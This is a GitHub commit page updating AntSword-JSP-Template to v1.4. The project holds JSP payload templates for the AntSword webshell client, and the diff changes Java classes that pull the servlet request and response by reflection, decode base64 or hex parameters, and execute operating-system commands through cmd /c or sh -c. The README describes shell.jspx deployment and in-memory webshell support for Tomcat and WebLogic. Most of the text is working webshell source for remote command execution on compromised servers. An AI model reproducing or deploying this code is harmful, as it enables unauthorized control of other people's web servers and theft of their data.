Skip to content

Commit

Permalink
update to v 1.4
Browse files Browse the repository at this point in the history 
1. 兼容JDK6
2. 兼容weblogic内存webshell
3. 优化报错信息
4. 解决windows下中文乱码的问题
5. 不再支持response作为入口参数
6. 增加用于测试的Web项目
  • Loading branch information
@yzddmr6
yzddmr6 committed Feb 2, 2021
1 parent 1e780b1 commit ed2489f
Show file tree
Hide file tree
Showing 43 changed files with 1,003 additions and 1,204 deletions.
1 change: 1 addition & 0 deletions .gitignore
View file
Expand Up @@ -2,3 +2,4 @@
*.class
.idea/
dist/*
out/
24 changes: 24 additions & 0 deletions AntSword-JSP-Template.iml
View file
@@ -0,0 +1,24 @@
<?xml version="1.0" encoding="UTF-8"?>
<module type="JAVA_MODULE" version="4">
<component name="FacetManager">
<facet type="web" name="Web">
<configuration>
<descriptors>
<deploymentDescriptor name="web.xml" url="file://$MODULE_DIR$/web/WEB-INF/web.xml" />
</descriptors>
<webroots>
<root url="file://$MODULE_DIR$/web" relative="/" />
</webroots>
</configuration>
</facet>
</component>
<component name="NewModuleRootManager" inherit-compiler-output="true">
<exclude-output />
<content url="file://$MODULE_DIR$">
<sourceFolder url="file://$MODULE_DIR$/src" isTestSource="false" />
</content>
<orderEntry type="inheritedJdk" />
<orderEntry type="sourceFolder" forTests="false" />
<orderEntry type="library" exported="" name="lib" level="project" />
</component>
</module>
17 changes: 13 additions & 4 deletions README.md
View file
@@ -1,11 +1,11 @@
# AntSword-JSP-Template v1.3
# AntSword-JSP-Template v1.4
中国蚁剑JSP一句话Payload

详细介绍:https://yzddmr6.tk/posts/antsword-diy-3/

编译环境:jdk7 + tomcat7
编译环境:jdk6 + tomcat7

适用范围:jdk7 - jdk14
适用范围:jdk6及以上

## 编译

Expand Down Expand Up @@ -97,10 +97,19 @@ shell.jspx
</jsp:scriptlet>
</jsp:root>
```
其中`pageContext`可以替换为`request`或者`response`,以实现对Tomcat内存Webshell的兼容
其中`pageContext`可以替换为`request`,以实现对内存Webshell的兼容。

## 更新日志

### v 1.4

1. 兼容JDK6
2. 兼容weblogic内存webshell
3. 优化报错信息
4. 解决windows下中文乱码的问题
5. 不再支持response作为入口参数
6. 增加用于测试的Web项目

### v 1.3

1. 兼容SpringBoot
Expand Down
2 changes: 1 addition & 1 deletion build.py
View file
Expand Up @@ -6,7 +6,7 @@
import shutil
import subprocess

javapath = r'C:\Program Files\Java\jdk1.7.0_75\bin\javac.exe' # javac路径
javapath = r'C:\Program Files (x86)\Java\jdk1.6.0_43\bin\javac.exe' # javac路径
classpath = os.getcwd()+"/lib" # apache lib路径
classpath = classpath+"/servlet-api.jar;" + classpath+"/jsp-api-2.1.jar" # 拼接classpath
if os.path.exists("./dist/"):
Expand Down
14 changes: 0 additions & 14 deletions src/AntSword-JSP-Template.iml
View file

This file was deleted.

50 changes: 21 additions & 29 deletions src/base/Info.java
View file
@@ -1,3 +1,5 @@
package base;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.File;
Expand All @@ -14,7 +16,7 @@ public boolean equals(Object obj) {
Class clazz = Class.forName("javax.servlet.jsp.PageContext");
request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj);
response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception ex) {
} catch (Exception e) {
if (obj instanceof HttpServletRequest) {
request = (HttpServletRequest) obj;
try {
Expand All @@ -24,40 +26,30 @@ public boolean equals(Object obj) {
Field resp = request2.getClass().getDeclaredField("response");
resp.setAccessible(true);
response = (HttpServletResponse) resp.get(request2);
} catch (Exception e) {
e.printStackTrace();
}
} catch (Exception ex) {
try {
response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception ignored) {

} else if (obj instanceof HttpServletResponse) {
response = (HttpServletResponse) obj;
try {
Field resp = response.getClass().getDeclaredField("response");
resp.setAccessible(true);
HttpServletResponse response2 = (HttpServletResponse) resp.get(response);
Field req = response2.getClass().getDeclaredField("request");
req.setAccessible(true);
request = (HttpServletRequest) req.get(response2);
} catch (Exception e) {
e.printStackTrace();
}
}
}
}
cs = request.getParameter("charset") != null ? request.getParameter("charset") : "UTF-8";
cs = "UTF-8";
StringBuffer output = new StringBuffer("");
StringBuffer sb = new StringBuffer("");
String tag_s = "->|";
String tag_e = "|<-";
try {
response.setContentType("text/html");
request.setCharacterEncoding(cs);
response.setCharacterEncoding(cs);
output.append(tag_s);
sb.append(SysInfoCode(request));
output.append(sb.toString());
output.append(tag_e);
response.getWriter().print(output.toString());
output.append(SysInfoCode(request));
} catch (Exception e) {
sb.append("ERROR" + ":// " + e.toString());
output.append("ERROR:// " + e.toString());
}
try {
response.getWriter().print(tag_s + output.toString() + tag_e);
} catch (Exception ignored) {
}
return true;
}
Expand All @@ -83,15 +75,15 @@ String SysInfoCode(HttpServletRequest r) {
}

String WwwRootPathCode(String d) {
String s = "";
if (!d.substring(0, 1).equals("/")) {
StringBuilder s = new StringBuilder();
if (!d.startsWith("/")) {
File[] roots = File.listRoots();
for (int i = 0; i < roots.length; i++) {
s += roots[i].toString().substring(0, 2) + "";
for (File root : roots) {
s.append(root.toString(), 0, 2);
}
} else {
s += "/";
s.append("/");
}
return s;
return s.toString();
}
}
43 changes: 15 additions & 28 deletions src/base/Probedb.java
View file
@@ -1,3 +1,5 @@
package base;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.lang.reflect.Field;
Expand All @@ -13,7 +15,7 @@ public boolean equals(Object obj) {
Class clazz = Class.forName("javax.servlet.jsp.PageContext");
request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj);
response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception ex) {
} catch (Exception e) {
if (obj instanceof HttpServletRequest) {
request = (HttpServletRequest) obj;
try {
Expand All @@ -23,46 +25,31 @@ public boolean equals(Object obj) {
Field resp = request2.getClass().getDeclaredField("response");
resp.setAccessible(true);
response = (HttpServletResponse) resp.get(request2);
} catch (Exception e) {
e.printStackTrace();
}
} catch (Exception ex) {
try {
response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception ignored) {

} else if (obj instanceof HttpServletResponse) {
response = (HttpServletResponse) obj;
try {
Field resp = response.getClass().getDeclaredField("response");
resp.setAccessible(true);
HttpServletResponse response2 = (HttpServletResponse) resp.get(response);
Field req = response2.getClass().getDeclaredField("request");
req.setAccessible(true);
request = (HttpServletRequest) req.get(response2);
} catch (Exception e) {
e.printStackTrace();
}
}
}
}

cs = "UTF-8";
StringBuffer output = new StringBuffer("");
StringBuffer sb = new StringBuffer("");
String tag_s = "->|";
String tag_e = "|<-";
cs = request.getParameter("charset") != null ? request.getParameter("charset") : "UTF-8";
try {
response.setContentType("text/html");
request.setCharacterEncoding(cs);
response.setCharacterEncoding(cs);
output.append(tag_s);
sb.append(ProbedbCode(request));
output.append(sb.toString());
output.append(tag_e);
response.getWriter().print(output.toString());
output.append(ProbedbCode(request));
} catch (Exception e) {
sb.append(tag_s + "ERROR" + ":// " + e.toString() + tag_e);
try {
response.getWriter().print(sb.toString());
} catch (Exception ex) {

}
output.append("ERROR:// " + e.toString());
}
try {
response.getWriter().print(tag_s + output.toString() + tag_e);
} catch (Exception ignored) {
}
return true;
}
Expand Down
58 changes: 26 additions & 32 deletions src/command/Exec.java
View file
@@ -1,3 +1,5 @@
package command;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.BufferedReader;
Expand All @@ -21,7 +23,7 @@ public boolean equals(Object obj) {
Class clazz = Class.forName("javax.servlet.jsp.PageContext");
request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj);
response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception ex) {
} catch (Exception e) {
if (obj instanceof HttpServletRequest) {
request = (HttpServletRequest) obj;
try {
Expand All @@ -31,29 +33,19 @@ public boolean equals(Object obj) {
Field resp = request2.getClass().getDeclaredField("response");
resp.setAccessible(true);
response = (HttpServletResponse) resp.get(request2);
} catch (Exception e) {
e.printStackTrace();
}
} catch (Exception ex) {
try {
response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj);
} catch (Exception ignored) {

} else if (obj instanceof HttpServletResponse) {
response = (HttpServletResponse) obj;
try {
Field resp = response.getClass().getDeclaredField("response");
resp.setAccessible(true);
HttpServletResponse response2 = (HttpServletResponse) resp.get(response);
Field req = response2.getClass().getDeclaredField("request");
req.setAccessible(true);
request = (HttpServletRequest) req.get(response2);
} catch (Exception e) {
e.printStackTrace();
}
}
}
}
randomPrefix = "antswordrandomPrefix";
encoder = "base64";
cs = "antswordCharset";
StringBuffer output = new StringBuffer("");
StringBuffer sb = new StringBuffer("");
String tag_s = "->|";
String tag_e = "|<-";
String varkey1 = "antswordargbin";
Expand All @@ -63,23 +55,25 @@ public boolean equals(Object obj) {
response.setContentType("text/html");
request.setCharacterEncoding(cs);
response.setCharacterEncoding(cs);
String z1 = EC(decode(request.getParameter(varkey1) + ""));
String z2 = EC(decode(request.getParameter(varkey2) + ""));
String z3 = EC(decode(request.getParameter(varkey3) + ""));
output.append(tag_s);
sb.append(ExecuteCommandCode(z1, z2, z3));
output.append(sb.toString());
output.append(tag_e);
response.getWriter().print(output.toString());
String z1 = decode(request.getParameter(varkey1));
String z2 = decode(request.getParameter(varkey2));
String z3 = decode(request.getParameter(varkey3));
output.append(ExecuteCommandCode(z1, z2, z3));
} catch (Exception e) {
sb.append("ERROR" + ":// " + e.toString());
output.append("ERROR:// " + e.toString());
}
try {
response.getWriter().print(tag_s + output.toString() + tag_e);
} catch (Exception ignored) {
}
return true;
}

String EC(String s) throws Exception {
if (encoder.equals("hex")) return s;
return new String(s.getBytes(), cs);
public static void main(String[] args) throws Exception {
Exec exec = new Exec();
exec.cs = "GBK";
String result = exec.ExecuteCommandCode("cmd", "net user", "");
System.out.println(result);
}

String decode(String str) throws Exception {
Expand All @@ -102,7 +96,7 @@ String decode(String str) throws Exception {
ss = ss + (hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1))) + ",";
baos.write((hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1))));
}
return baos.toString("UTF-8");
return baos.toString(cs);
} else if (encoder.equals("base64")) {
byte[] bt = null;
try {
Expand All @@ -113,16 +107,16 @@ String decode(String str) throws Exception {
Object decoder = clazz.getMethod("getDecoder").invoke(null);
bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
return new String(bt, "UTF-8");
return new String(bt, cs);
}
return str;
}

String ExecuteCommandCode(String cmdPath, String command, String envstr) throws Exception {
public String ExecuteCommandCode(String cmdPath, String command, String envstr) throws Exception {
StringBuffer sb = new StringBuffer("");
String[] c = {cmdPath, !isWin() ? "-c" : "/c", command};
Map<String, String> readonlyenv = System.getenv();
Map<String, String> cmdenv = new HashMap<>(readonlyenv);
Map<String, String> cmdenv = new HashMap<String, String>(readonlyenv);
String[] envs = envstr.split("\\|\\|\\|asline\\|\\|\\|");
for (int i = 0; i < envs.length; i++) {
String[] es = envs[i].split("\\|\\|\\|askey\\|\\|\\|");
Expand Down

0 comments on commit ed2489f

Please sign in to comment.